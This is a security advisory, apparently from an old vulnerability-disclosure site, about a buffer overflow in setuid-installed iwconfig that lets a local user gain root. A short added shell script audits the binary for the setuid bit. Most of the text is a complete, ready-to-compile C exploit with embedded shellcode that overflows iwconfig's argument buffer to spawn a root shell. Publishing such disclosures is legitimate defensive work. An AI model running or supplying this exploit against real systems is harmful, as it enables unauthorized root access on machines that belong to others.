Iwconfig Buffer Overflow
Summary
Iwconfig "is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation". A buffer overflow vulnerability in iwconfig allows a local attacker to gain root privileges wherever the program is installed with setuid privileges.
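The precondition above is that iwconfig is installed setuid. The following shell audit is an added example, not part of the original advisory: it checks the two install paths named in the exploit's header comment and reports whether the setuid bit is present. The function names and output labels are assumptions of the example.

```shell
#!/bin/sh
# Added example: audit iwconfig for the setuid bit this advisory depends on.
# Default paths are the two named in the exploit's header comment.

# Print one of: absent | setuid-root | setuid-other | not-setuid
classify_binary() {
    f=$1
    [ -f "$f" ] || { echo absent; return 0; }
    if [ -u "$f" ]; then
        # find -user 0 matches only when the owner is uid 0 (root);
        # -H follows a symlink given on the command line.
        if [ -n "$(find -H "$f" -prune -user 0 2>/dev/null)" ]; then
            echo setuid-root
        else
            echo setuid-other
        fi
    else
        echo not-setuid
    fi
}

# Report every candidate path and flag the ones that need `chmod u-s`.
audit_iwconfig() {
    [ "$#" -gt 0 ] || set -- /sbin/iwconfig /usr/sbin/iwconfig
    for path in "$@"; do
        state=$(classify_binary "$path")
        case $state in
            setuid-root)
                echo "EXPOSED  $path (setuid root; fix: chmod u-s $path)" ;;
            setuid-other)
                echo "REVIEW   $path (setuid, not owned by root)" ;;
            *)
                echo "OK       $path ($state)" ;;
        esac
    done
}

audit_iwconfig "$@"
```

Pass other paths as arguments to audit a non-default install location.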
Credit:
The information has been provided by Dcrab.
The original article can be found at: http://icis.digitalparadox.org/~dcrab/dc_iwconfig.c
Details
Exploit Code:
//Diabolic Crab's Local Root Exploit
// /usr/sbin/iwconfig or /sbin/iwconfig
//dcrab@hackerscenter.com
//www.hackerscenter.com
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main(int argc,char **argv){
    char buf[96];
    unsigned long ret;
    int i;
    char *prog[]={"/sbin/iwconfig",buf,NULL};
    char *env[]={"EGG=",shellcode,NULL};
    ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
    printf("use ret addr: 0x%lx\n",ret);
    memset(buf,0x41,sizeof(buf));
    memcpy(&buf[92],&ret,4);
    execve(prog[0],prog,env);
}